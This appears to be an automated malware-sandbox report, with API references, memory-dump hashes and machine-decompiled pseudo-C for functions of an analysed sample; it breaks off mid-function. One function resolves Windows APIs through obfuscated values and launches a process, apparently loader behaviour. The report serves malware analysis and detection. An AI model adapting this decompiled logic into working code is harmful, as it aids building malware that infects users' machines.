                                                                                                                                                                                                                                0x00a870f4
                                                                                                                                                                                                                                0x00a870f4
                                                                                                                                                                                                                                0x00a870fd
                                                                                                                                                                                                                                0x00a87106
                                                                                                                                                                                                                                0x00a87108
                                                                                                                                                                                                                                0x00a87108
                                                                                                                                                                                                                                0x00a87115
                                                                                                                                                                                                                                0x00a87120
                                                                                                                                                                                                                                0x00a87123
                                                                                                                                                                                                                                0x00a87128
                                                                                                                                                                                                                                0x00a87131
                                                                                                                                                                                                                                0x00a87134
                                                                                                                                                                                                                                0x00a87139
                                                                                                                                                                                                                                0x00a8713c
                                                                                                                                                                                                                                0x00a87141
                                                                                                                                                                                                                                0x00a87144
                                                                                                                                                                                                                                0x00a87150
                                                                                                                                                                                                                                0x00a8715d
                                                                                                                                                                                                                                0x00a8715f
                                                                                                                                                                                                                                0x00a87165
                                                                                                                                                                                                                                0x00a8716a
                                                                                                                                                                                                                                0x00a87175
                                                                                                                                                                                                                                0x00a87177
                                                                                                                                                                                                                                0x00a8717a
                                                                                                                                                                                                                                0x00a8717c
                                                                                                                                                                                                                                0x00a87181
                                                                                                                                                                                                                                0x00a87187
                                                                                                                                                                                                                                0x00a8718c
                                                                                                                                                                                                                                0x00a8718f
                                                                                                                                                                                                                                0x00a87194
                                                                                                                                                                                                                                0x00a871a1
                                                                                                                                                                                                                                0x00a871a3
                                                                                                                                                                                                                                0x00a871a9
                                                                                                                                                                                                                                0x00a871b3
                                                                                                                                                                                                                                0x00a871b3
                                                                                                                                                                                                                                0x00a871b5
                                                                                                                                                                                                                                0x00a871ba
                                                                                                                                                                                                                                0x00a871bf
                                                                                                                                                                                                                                0x00a871c2
                                                                                                                                                                                                                                0x00a871c7
                                                                                                                                                                                                                                0x00a871d4
                                                                                                                                                                                                                                0x00a871d6
                                                                                                                                                                                                                                0x00a871e4
                                                                                                                                                                                                                                0x00a871e4
                                                                                                                                                                                                                                0x00a871e6
                                                                                                                                                                                                                                0x00a871f4
                                                                                                                                                                                                                                0x00a871f9
                                                                                                                                                                                                                                0x00a871fb
                                                                                                                                                                                                                                0x00a87200
                                                                                                                                                                                                                                0x00a873c1
                                                                                                                                                                                                                                0x00a873cb
                                                                                                                                                                                                                                0x00a873d4
                                                                                                                                                                                                                                0x00a87206
                                                                                                                                                                                                                                0x00a87212
                                                                                                                                                                                                                                0x00a87218
                                                                                                                                                                                                                                0x00a8721d
                                                                                                                                                                                                                                0x00a873b5
                                                                                                                                                                                                                                0x00a873bf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a873bf
                                                                                                                                                                                                                                0x00a87229
                                                                                                                                                                                                                                0x00a8722e
                                                                                                                                                                                                                                0x00a87237
                                                                                                                                                                                                                                0x00a87248
                                                                                                                                                                                                                                0x00a8724c
                                                                                                                                                                                                                                0x00a87255
                                                                                                                                                                                                                                0x00a8725b
                                                                                                                                                                                                                                0x00a8726a
                                                                                                                                                                                                                                0x00a87271
                                                                                                                                                                                                                                0x00a8727a
                                                                                                                                                                                                                                0x00a87280
                                                                                                                                                                                                                                0x00a873a9
                                                                                                                                                                                                                                0x00a873b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a873b3
                                                                                                                                                                                                                                0x00a8728c
                                                                                                                                                                                                                                0x00a87292
                                                                                                                                                                                                                                0x00a87293
                                                                                                                                                                                                                                0x00a87298
                                                                                                                                                                                                                                0x00a8729d
                                                                                                                                                                                                                                0x00a8739f
                                                                                                                                                                                                                                0x00a873a7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a873a7
                                                                                                                                                                                                                                0x00a872a6
                                                                                                                                                                                                                                0x00a872ad
                                                                                                                                                                                                                                0x00a872b5
                                                                                                                                                                                                                                0x00a872ba
                                                                                                                                                                                                                                0x00a872c3
                                                                                                                                                                                                                                0x00a872ce
                                                                                                                                                                                                                                0x00a872d3
                                                                                                                                                                                                                                0x00a872d8
                                                                                                                                                                                                                                0x00a873d7
                                                                                                                                                                                                                                0x00a8738b
                                                                                                                                                                                                                                0x00a8738b
                                                                                                                                                                                                                                0x00a87390
                                                                                                                                                                                                                                0x00a8739b
                                                                                                                                                                                                                                0x00a8739d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8739d
                                                                                                                                                                                                                                0x00a872e2
                                                                                                                                                                                                                                0x00a872e7
                                                                                                                                                                                                                                0x00a872ec
                                                                                                                                                                                                                                0x00a872f1
                                                                                                                                                                                                                                0x00a87301
                                                                                                                                                                                                                                0x00a87304
                                                                                                                                                                                                                                0x00a8730a
                                                                                                                                                                                                                                0x00a87310
                                                                                                                                                                                                                                0x00a87316
                                                                                                                                                                                                                                0x00a87319
                                                                                                                                                                                                                                0x00a8731f
                                                                                                                                                                                                                                0x00a87322
                                                                                                                                                                                                                                0x00a87327
                                                                                                                                                                                                                                0x00a8732b
                                                                                                                                                                                                                                0x00a8732b
                                                                                                                                                                                                                                0x00a87337
                                                                                                                                                                                                                                0x00a87343
                                                                                                                                                                                                                                0x00a87347
                                                                                                                                                                                                                                0x00a87349
                                                                                                                                                                                                                                0x00a8734e
                                                                                                                                                                                                                                0x00a87350
                                                                                                                                                                                                                                0x00a87355
                                                                                                                                                                                                                                0x00a8735a
                                                                                                                                                                                                                                0x00a87367
                                                                                                                                                                                                                                0x00a8736f
                                                                                                                                                                                                                                0x00a87372
                                                                                                                                                                                                                                0x00a87372
                                                                                                                                                                                                                                0x00a8734e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a87339
                                                                                                                                                                                                                                0x00a8733d
                                                                                                                                                                                                                                0x00a87374
                                                                                                                                                                                                                                0x00a87377
                                                                                                                                                                                                                                0x00a87380
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a87380
                                                                                                                                                                                                                                0x00a8733f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8733f
                                                                                                                                                                                                                                0x00a87337

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A87108
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A87158
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A87175
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A871A1
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A871B3
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A871D4
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A871E4
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A87212
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A87223
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A87237
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A87255
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?,01AE95B0), ref: 00A822D6
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(?,?,?,00A8A714,?,01AE95B0), ref: 00A822DE
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: strcpy.NTDLL ref: 00A822F5
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrcat.KERNEL32(00000000,?), ref: 00A82300
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A8231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,00A8C2AC,?,01AE95B0), ref: 00A8728C
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(01AE9B98,00000000,00000000,770CC740,00A8A73F,00000000), ref: 00A82639
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(?), ref: 00A82641
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcpy.KERNEL32(00000000,01AE9B98), ref: 00A82655
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcat.KERNEL32(00000000,?), ref: 00A82660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 00A872AD
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00A872B5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00A872C3
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00A872C9
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 00A8735A
                                                                                                                                                                                                                                  • Part of subcall function 00A82EA6: SysAllocString.OLEAUT32(?), ref: 00A82EE1
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A8739B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A873A7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,01AE95B0), ref: 00A873B3
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A873BF
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A873CB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3748877296-1536154274
                                                                                                                                                                                                                                • Opcode ID: 7117540b2d48687d77ff8abde1d79da8fc4de23f55b9810fce37b66c444afcf9
                                                                                                                                                                                                                                • Instruction ID: 994af3fd3f1afe67f9ed8d9ef3490968e6d1101d255d358449eafc61eebdc2da
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7117540b2d48687d77ff8abde1d79da8fc4de23f55b9810fce37b66c444afcf9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66913671900209EFCB11EFA4DD89EAE7BB9FF48350F244065F8059B2A1DB31D912EB61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DC947, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DC947(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x736eb6f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E736DA293(_t46);
							E736DE879( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E736DA293(_t47);
							E736DE977( *((intOrPtr*)(_t74 + 0x88)));
						}
						E736DA293( *((intOrPtr*)(_t74 + 0x7c)));
						E736DA293( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E736DA293( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E736DA293( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E736DA293( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E736DA293( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E736DCABA( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x736eb640) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E736DA293(_t31);
							E736DA293( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe87
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E736DA293(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E736DA293(_t74);
			}















                                                                                                                                                                                                                                0x736dc94f
                                                                                                                                                                                                                                0x736dc953
                                                                                                                                                                                                                                0x736dc95b
                                                                                                                                                                                                                                0x736dc964
                                                                                                                                                                                                                                0x736dc969
                                                                                                                                                                                                                                0x736dc970
                                                                                                                                                                                                                                0x736dc978
                                                                                                                                                                                                                                0x736dc980
                                                                                                                                                                                                                                0x736dc98b
                                                                                                                                                                                                                                0x736dc991
                                                                                                                                                                                                                                0x736dc992
                                                                                                                                                                                                                                0x736dc99a
                                                                                                                                                                                                                                0x736dc9a2
                                                                                                                                                                                                                                0x736dc9ad
                                                                                                                                                                                                                                0x736dc9b3
                                                                                                                                                                                                                                0x736dc9b7
                                                                                                                                                                                                                                0x736dc9c2
                                                                                                                                                                                                                                0x736dc9c8
                                                                                                                                                                                                                                0x736dc969
                                                                                                                                                                                                                                0x736dc9c9
                                                                                                                                                                                                                                0x736dc9d1
                                                                                                                                                                                                                                0x736dc9e4
                                                                                                                                                                                                                                0x736dc9f7
                                                                                                                                                                                                                                0x736dca05
                                                                                                                                                                                                                                0x736dca10
                                                                                                                                                                                                                                0x736dca15
                                                                                                                                                                                                                                0x736dca1e
                                                                                                                                                                                                                                0x736dca26
                                                                                                                                                                                                                                0x736dca27
                                                                                                                                                                                                                                0x736dca2d
                                                                                                                                                                                                                                0x736dca30
                                                                                                                                                                                                                                0x736dca33
                                                                                                                                                                                                                                0x736dca3a
                                                                                                                                                                                                                                0x736dca3c
                                                                                                                                                                                                                                0x736dca40
                                                                                                                                                                                                                                0x736dca48
                                                                                                                                                                                                                                0x736dca4f
                                                                                                                                                                                                                                0x736dca55
                                                                                                                                                                                                                                0x736dca56
                                                                                                                                                                                                                                0x736dca56
                                                                                                                                                                                                                                0x736dca5d
                                                                                                                                                                                                                                0x736dca5f
                                                                                                                                                                                                                                0x736dca5f
                                                                                                                                                                                                                                0x736dca64
                                                                                                                                                                                                                                0x736dca6c
                                                                                                                                                                                                                                0x736dca71
                                                                                                                                                                                                                                0x736dca72
                                                                                                                                                                                                                                0x736dca72
                                                                                                                                                                                                                                0x736dca75
                                                                                                                                                                                                                                0x736dca78
                                                                                                                                                                                                                                0x736dca7b
                                                                                                                                                                                                                                0x736dca7e
                                                                                                                                                                                                                                0x736dca7e
                                                                                                                                                                                                                                0x736dca90

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 736DC98B
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE896
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8A8
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8BA
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8CC
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8DE
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8F0
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE902
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE914
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE926
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE938
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE94A
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE95C
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE96E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC980
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9A2
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9B7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9C2
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9E4
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9F7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA10
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA48
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA4F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA6C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA84
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                • Opcode ID: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction ID: f74a755e22aef0896a9b5fa408a0da64e454c7f0919e4df320d9c99cfb1a0f4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D315E31A247089FEF129B7ADA40B5673F9BF00710F18452EE49BDB2D0DE75EA508798
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A874A5, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E00A874A5(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00A86856(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00A8A929( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xa8d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xa8d2e0; // 0x105a5a8
					_t18 = _t47 + 0xa8e3b3; // 0x73797325
					_t68 = E00A81EBA(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xa8d2e0; // 0x105a5a8
						_t19 = _t50 + 0xa8e760; // 0x1ae8d08
						_t20 = _t50 + 0xa8e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00A87020();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00A87020();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xa8d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00A853BB(_t70);
				goto L12;
			}


















                                                                                                                                                                                                                                0x00a874ad
                                                                                                                                                                                                                                0x00a874ad
                                                                                                                                                                                                                                0x00a874bc
                                                                                                                                                                                                                                0x00a874c3
                                                                                                                                                                                                                                0x00a874c8
                                                                                                                                                                                                                                0x00a875d5
                                                                                                                                                                                                                                0x00a875dc
                                                                                                                                                                                                                                0x00a875dc
                                                                                                                                                                                                                                0x00a874d7
                                                                                                                                                                                                                                0x00a874df
                                                                                                                                                                                                                                0x00a874e2
                                                                                                                                                                                                                                0x00a874e7
                                                                                                                                                                                                                                0x00a874fc
                                                                                                                                                                                                                                0x00a87502
                                                                                                                                                                                                                                0x00a87503
                                                                                                                                                                                                                                0x00a87506
                                                                                                                                                                                                                                0x00a8750c
                                                                                                                                                                                                                                0x00a8750f
                                                                                                                                                                                                                                0x00a87514
                                                                                                                                                                                                                                0x00a8751c
                                                                                                                                                                                                                                0x00a87528
                                                                                                                                                                                                                                0x00a8752c
                                                                                                                                                                                                                                0x00a875bc
                                                                                                                                                                                                                                0x00a87532
                                                                                                                                                                                                                                0x00a87532
                                                                                                                                                                                                                                0x00a87537
                                                                                                                                                                                                                                0x00a8753e
                                                                                                                                                                                                                                0x00a87552
                                                                                                                                                                                                                                0x00a87556
                                                                                                                                                                                                                                0x00a875a5
                                                                                                                                                                                                                                0x00a87558
                                                                                                                                                                                                                                0x00a87559
                                                                                                                                                                                                                                0x00a87560
                                                                                                                                                                                                                                0x00a87579
                                                                                                                                                                                                                                0x00a8757b
                                                                                                                                                                                                                                0x00a8757f
                                                                                                                                                                                                                                0x00a87586
                                                                                                                                                                                                                                0x00a875a0
                                                                                                                                                                                                                                0x00a87588
                                                                                                                                                                                                                                0x00a87591
                                                                                                                                                                                                                                0x00a87596
                                                                                                                                                                                                                                0x00a87596
                                                                                                                                                                                                                                0x00a87586
                                                                                                                                                                                                                                0x00a875b4
                                                                                                                                                                                                                                0x00a875b4
                                                                                                                                                                                                                                0x00a8752c
                                                                                                                                                                                                                                0x00a875c3
                                                                                                                                                                                                                                0x00a875cc
                                                                                                                                                                                                                                0x00a875d0
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A874C1,?,00000001,?,?,00000000,00000000), ref: 00A8687B
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A8689D
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A868B3
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A868C9
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A868DF
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A868F5
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A8750F
                                                                                                                                                                                                                                  • Part of subcall function 00A81EBA: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A87528,73797325), ref: 00A81ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A81EBA: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A81EE5
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4E52454B,01AE8D08,73797325), ref: 00A87545
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00A8754C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A875B4
                                                                                                                                                                                                                                  • Part of subcall function 00A87020: GetProcAddress.KERNEL32(36776F57,00A86B1C), ref: 00A8703B
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000001), ref: 00A87591
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A87596
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 00A8759A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3075724336-2342693527
                                                                                                                                                                                                                                • Opcode ID: 8b95e27fd347eba5c3a4174b63b52238c5e592f5790d22ad1ebf65057734a8c8
                                                                                                                                                                                                                                • Instruction ID: 6cac216c784218e496cbbf9698459597fa1f7a64cc6a439e89610484f48985d7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b95e27fd347eba5c3a4174b63b52238c5e592f5790d22ad1ebf65057734a8c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 803121B2804208EFDB11FFE4DD89E9EBBBCEB48354F204465F506A7161D7709D459BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9B4D, Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                			E736D9B4D(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x736e1c18;
				if(_t68 != 0x736e1c18) {
					E736DA293(_t68);
					_t36 = _a4;
				}
				E736DA293( *((intOrPtr*)(_t36 + 0x3c)));
				E736DA293( *((intOrPtr*)(_a4 + 0x30)));
				E736DA293( *((intOrPtr*)(_a4 + 0x34)));
				E736DA293( *((intOrPtr*)(_a4 + 0x38)));
				E736DA293( *((intOrPtr*)(_a4 + 0x28)));
				E736DA293( *((intOrPtr*)(_a4 + 0x2c)));
